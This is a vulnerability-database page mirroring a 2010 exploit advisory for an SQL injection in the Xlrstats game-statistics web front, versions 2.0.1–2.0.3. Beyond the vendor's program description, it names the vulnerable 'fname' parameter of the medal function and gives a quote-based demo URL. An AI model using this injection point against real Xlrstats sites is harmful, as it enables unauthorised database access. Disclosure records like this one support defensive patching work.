Lucene search
K

Xlrstats 2.0.1 SQL Injection

🗓️ 15 Oct 2010 00:00:00Reported by Sky4Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Xlrstats 2.0.1 SQL Injection vulnerabilit

Code
`----------------------------------------------------------------------------  
# Sql injection vulnerability  
----------------------------------------------------------------------------  
# Exploit Title: Xlrstats (Big Brother Bot Game) SQL injection 2.0.1  
----------------------------------------------------------------------------  
# Author : Sky4  
# Email : [email protected]  
# Date : 14/10/2010  
# homepage : http://www.sky4.tk  
  
# Software Link: http://www.bigbrotherbot.net/forums/downloads/?sa=view;down=100  
# Script homepage:http://www.xlrstats.com/  
# Version: 2.0.1 / 2.0.2 /2.0.3  
  
  
----------------------------------------------------------  
[About The Program]  
XLRstats is the only Real Time game stats program  
out there. When you make a kill in game, it's in the stats at the very  
same moment! No cronjobs and perl programs to generate statistics... REAL TIME!XLRstats is a statistics plugin for BigBrotherBot (B3)  
and it stores all kill-events in a mySQL database. Stats are available  
in game using the !xlrstats command in chat, but much more can be viewed  
in the XLRstats web front!Analyze your weapon usage, where do you  
hit your enemies, who are your worst enemies... all this and more  
information is available on the site.Version 2 comes with ranks,  
medals and several templates. With the templates it's very easy to  
create your own look and feel. Create your own template matching your  
clans website... no problem.-----------------------------------------------------------<<[ Exploit ]>>--http://www.localhost.com/xlrstats/index.php?func=medal&fname=1  
[demo]http://www.localhost.com/xlrstats/index.php?func=medal&fname='1'------------------------------------  
##############################################################  
# www.sky4.tk  
#  
# [email protected]  
# 4hm4d H0w4ri  
# Palestine In our Hearts  
##############################################################  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Oct 2010 00:00Current
0.2Low risk
Vulners AI Score0.2
19